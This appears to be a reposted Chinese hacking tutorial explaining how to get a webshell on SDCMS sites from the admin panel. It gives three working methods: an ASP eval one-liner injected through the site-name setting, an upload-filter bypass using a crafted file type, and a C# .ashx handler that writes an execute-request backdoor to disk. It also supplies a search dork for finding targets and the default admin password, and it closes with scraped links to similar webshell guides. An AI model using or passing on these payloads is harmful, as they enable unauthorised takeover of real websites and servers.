SDcms后台拿webshell
第一种方法:
进入后台-->系统管理-->系统设置-->系统设置->网站名称;
把网站名称内容修改为 "%><%eval request("80lr")' //密码为80lr
用菜刀链接http://www.80lr.com/inc/const.asp 就搞定了。
第二种方法:
进入后台-->系统管理-->系统设置-->系统设置->上传设置;
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!
第三种方法:
进入后台-->界面管理-->模板文件管理-->创建文件
文件名写入getshell.ashx
内容写入下面内容:
/====================复制下面的=========================/
<%@ WebHandler Language="C#" Class="Handler" %>
using System;
using System.Web;
using System.IO;
public class Handler : IHttpHandler {
public void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/plain";
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
file1.Write("<%response.clear:execute request(\"80lr\"):response.End%>");
file1.Flush();
file1.Close();
}
public bool IsReusable {
get {
return false;
}
}
}
/=============================================/
访问这个地址:http://www.80lr.com/skins/2009/getshell.ashx
会在http://www.80lr.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为80lr 用菜刀链接
送上关键词:intitle:"Powered By SDCMS"
后台http://www.80lr.com/admin/ 默认用户和密码:sdcms
本文来自易寒网络,转载务必注明原文链接:http://www.80lr.com/oday/241.html
SDcms后台拿webshell相关推荐
- 后台拿webshell的常用方法总结
时间:2014-04-16 11:22 来源:阳光在线下载 标签:js6899.com 一.直接上传获得webshell 这种对php和jsp的一些程序比较常见,MolyX BOARD就是其中一例,直 ...
- 后台拿webshell的方法总结
刚看到的文章,觉得还不比较全,可能有些朋友已经看过了,不过我还是在这分享下吧,省得大家去找... 一.直接上传获得webshell 这种对php和jsp的一些程序比较常见,MolyX BOARD就是其 ...
- 后台得到webshell方法大汇总
动网上传漏洞,相信大家拿下不少肉鸡吧.可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然天下,现在这种漏洞已经基本比较难见到了,不排除一些小网站仍然存在此漏洞.在拿站过程中,我们经常费了九牛 ...
- 网站后台拿webshell
当我们通过一些漏洞进入后台之后就要想办法获取网站的控制权限,就是我们所说的拿webshell,这样就可以对网站进行任意编辑,一般都是通过漏洞向目标服务器写入一句话木马来getshell 根据语言的不同 ...
- 从后台得到webshell十大技巧大汇总(转)
在拿站过程中,我们经常费了九牛两虎之力拿到管理员帐号和密码,并顺利进入了后台,虽然此时与拿到网站webshell还有一步之遥,但还是有许多新手因想不出合适的方法而被拒之门外.因此,我们把常用的从后台得 ...
- 从后台得到webshell技巧大汇总
前 言 动网上传漏洞,相信大家拿下不少肉鸡吧.可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然天下,现在这种漏洞已经基本比较难见到了,不排除一些小网站仍然存在此漏洞.在拿站过程中,我们经常 ...
- 从后台得到webshell十大技巧大汇总
前 言 动网上传漏洞,相信大家拿下不少肉鸡吧.可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然天下,现在这种漏洞已经基本比较难见到了,不排除一些小网站仍然存在此漏洞.在拿站过程中,我们经常 ...
- 从后台得到webshell
前 言 动网上传漏洞,相信大家拿下不少肉鸡吧.可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然天下,现在这种漏洞已经基本比较难见到了,不排除 一些小网站仍然存在此漏洞.在拿站过程中,我们经 ...
- 网站后台服务器脚本,后台get webshell的方法
一.直接得到webshell 有些网站后台为了方便,可以直接写入脚本文件,对此可以直接写入webshell 二.利用数据库备份 方法老掉牙了.现在数据库备份一般都写死了. 上传有限制,只能上传图片格式 ...
最新文章
- Winrar目录穿越漏洞复现
- RabbitMQ简介以及应用
- OGEngine_粒子效果
- pepflashplayer32_25_0_0_127.dll: 0x59952C6D is not a valid instance ID.
- CentOS 7磁盘分区及文件系统管理
- spring mvc学习(2):spring jar包下载
- es6 初级之箭头函数
- 苹果被曝寻求收购Drive.ai:吴恩达参与运营,多家中国VC投资
- 首届 “女生科技体验节” 大爆料!
- 初学者上手python建模
- 模糊控制洗衣机MATLAB模型,洗衣机的模糊控制MATLAB仿真
- 深度多模态子空间聚类网络+代码实现
- 五大主流浏览器和内核
- 互联网赚钱的逻辑是什么?
- 京剧《赤壁》舌战群儒
- ArcGIS坡度分析(解决坡度分析80-89°高值居多)
- 阿里达摩院获KDD 2022最佳论文,国内企业首次获奖
- python 输出\xhh格式的16进制数据(改2)
- x=1u c语言,c语言中1u是什么意思
- 西门子et200 分布式i/o_西门子ET 200简介
热门文章
- 荣耀手机在HBuilderX中运行uni-app真机测试检测不到设备的解决方案
- 基于Qt的jpg、png图片批处理成svg图工具
- 微课 | 中台战略专题教案 附下载
- 南师大计算机科学在全国的排名,2017南京师范大学全国排名
- models.py 文件中的类及相关属性
- 皮尔逊相关系数(Pearson Correlation Coefficient, Pearson's r)
- Spring Boot配置绑定
- 是时候再来推荐一波Android 黑科技工具了
- 教育部:不得将研究生当作廉价劳动力!
- 好消息,(欢迎大家积极参与) * 贺新年 * 中大礼 * 华章图书 联手 W3CHINA 举办有奖调查、幸运获书活动!...